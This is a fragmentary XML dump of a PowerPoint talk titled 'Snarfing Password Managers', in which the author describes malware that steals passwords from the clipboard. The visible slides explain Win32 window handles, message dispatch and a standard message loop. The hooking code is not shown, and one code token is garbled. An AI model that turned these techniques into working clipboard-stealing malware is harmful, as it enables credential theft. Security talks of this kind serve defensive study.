            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Project - http://www.reactos.org/en/dev.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>AutoScreen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> library from http://autoscreen.sourceforge.net/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>List of win32k.sys calls http://j00ru.vexillium.org/win32k_syscalls/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2800"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596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How it works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4114800"/>
            <a:ext cx="9071640" cy="2894399"/>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a:t>What my malware does is attack the password manager while its weakest - the one time the password is in clear text. A chain is only as strong as its weakest link. In the case of these password managers - I am of course talking about the copy buffer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4008959" y="988920"/>
            <a:ext cx="2208960" cy="303444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596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dirty="0" smtClean="0"/>
              <a:t>What the hell is a Window Handle?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3856038"/>
            <a:ext cx="9071640" cy="358140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2200" dirty="0" smtClean="0"/>
              <a:t>When you see HWND in code, it’s a window handle. Its defined as an unsigned integer. Windows uses these to identify windows, controls, forms, anything having to do with user space. They are always unique.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>GetWindowText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>() function takes a window handle and returns  a pointer to the text inside. I was considering looping through every known window handle, but scrapped this idea when I realized how many window handles there could be on a system. Remember, unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> = a max of 2 to the 32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> power or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>0 through 4,294,967,295. Screw that.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="D:\pix\windohandl.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3592512" y="960438"/>
            <a:ext cx="3235326" cy="2760488"/>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The System Dispatcher</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="1642680"/>
            <a:ext cx="9071640" cy="582876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2800" dirty="0"/>
              <a:t>The dispatcher is a conceptual windows component. It is responsible for sending / receiving messages from other application's respective message queues and telling the kernel / GDI what happens.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>It is responsible for all user interaction with windows and their respective window messages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>When / while hooking window messages, we are in essence becoming the Dispatcher since we have the power to block, send, intercept and receive messages.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133560"/>
            <a:ext cx="9071640" cy="5201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Window Messages 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="833039"/>
            <a:ext cx="9071640" cy="607428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1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>Unlike console applications, Windowed applications are event-driven. They do not make explicit function calls (such as C run-time library calls) to obtain input. Instead, they wait for the system to pass input to them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>The system passes all input for an application to the various windows in the application. Each window has a function, called a window procedure, that the system calls whenever it has input for the window.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>Window messages are stored in an endless queue and get processed by the Message Loop. The following is what a typical queue loop looks like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>while(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>GetMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>(&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>Msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>, NULL, 0, 0) &gt; 0){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>    WNDPROC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>fWndProc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t> = (WNDPROC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>GetWindowLong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>Msg.hwnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>, GWL_WNDPROC);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>fWndProc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>Msg.hwnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>Msg.message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>Msg.wParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>Msg.lPazzzzzram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>As you can see, window based applications spend the majority of their time spinning round and round in this message loop, patiently awaiting a command. When the window is closed, 0 is returned to the loop which makes it stop. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>PostQuitMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="albany" pitchFamily="32"/>
              </a:rPr>
              <a:t>() does this.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133560"/>
            <a:ext cx="9071640" cy="5201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Window Messages 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503999" y="689040"/>
            <a:ext cx="9071640" cy="504468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r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Every window message in the queue stores, at the least:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>A window handle to which the message is directed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The message code, wParam and lParam, as you already correctly noted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The time when the message was posted, that you retrieve with GetMessageTime()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The position of the cursor when the message was posted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Messages are posted to the message queue by using the PostMessage function. PostMessage places a message at the end of a thread's message queue and returns immediately, without waiting for the thread to process the message. The function's parameters include a window handle, a message identifier, and two message parameters. The system copies these parameters to an MSG structure, fills the time and pt members of the structure, and places the structure in the message queue.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133560"/>
            <a:ext cx="9071640" cy="5201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Window Messages TL;DR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474840" y="4519440"/>
            <a:ext cx="9071640" cy="2118600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:defPPr marL="432000" marR="0" lvl="0" indent="-324000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1414"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFCC99"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buNone/>
              <a:tabLst/>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4"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFCC99"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char="●"/>
              <a:tabLst/>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tabLst/>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tabLst/>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tabLst/>
              <a:defRPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Albany" pitchFamily="18"/>
                <a:ea typeface="Andale Sans UI" pitchFamily="2"/>
                <a:cs typeface="Tahoma" pitchFamily="2"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Window sends messages that contain stuff. Stuff can be user input or user output. Stuff gets sent all the time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946239" y="1184760"/>
            <a:ext cx="4281480" cy="3702600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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55800"/>
            <a:ext cx="9071640" cy="5201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Identifying The Messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
            <a:videoFile r:link="rId1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-37800" y="651240"/>
            <a:ext cx="10165320" cy="6968880"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="CFE7F5"/>
          </a:solidFill>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:prstDash val="soli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yt-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TotalTime>
  <Words>1537</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>132</Paragraphs>
  <Slides>21</Slides>
  <Notes>21</Notes>
  <HiddenSlides>2</HiddenSlides>
  <MMClips>2</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vt:lpstr>
      <vt:lpstr>lyt-bluegrey</vt:lpstr>
      <vt:lpstr>Snarfing Password Managers</vt:lpstr>
      <vt:lpstr>What we're going to cover</vt:lpstr>
      <vt:lpstr>How it works</vt:lpstr>
      <vt:lpstr>What the hell is a Window Handle?</vt:lpstr>
      <vt:lpstr>The System Dispatcher</vt:lpstr>
      <vt:lpstr>Window Messages 1</vt:lpstr>
      <vt:lpstr>Window Messages 2</vt:lpstr>
      <vt:lpstr>Window Messages TL;DR</vt:lpstr>
      <vt:lpstr>Identifying The Messages</vt:lpstr>
      <vt:lpstr>About The Clipboard</vt:lpstr>
      <vt:lpstr>Snarfing The Clipboard</vt:lpstr>
      <vt:lpstr>The Hooker p1</vt:lpstr>
      <vt:lpstr>The Hooker p2</vt:lpstr>
      <vt:lpstr>Obtaining The Username</vt:lpstr>
      <vt:lpstr>Other Methods of Copy Buffer Interception</vt:lpstr>
      <vt:lpstr>The App In Action</vt:lpstr>
      <vt:lpstr>Will My AV Help Me?</vt:lpstr>
      <vt:lpstr>Prevention</vt:lpstr>
      <vt:lpstr>Download it here!</vt:lpstr>
      <vt:lpstr>Any Questions?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Snarfing Password Managers</dc:title>
  <dc:creator>AverageJoe</dc:creator>
  <cp:lastModifiedBy>Joe G</cp:lastModifiedBy>
  <cp:revision>102</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-10-18T20:39:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-03-22T15:37:43Z</dcterms:modified>
</cp:coreProperties>
</file>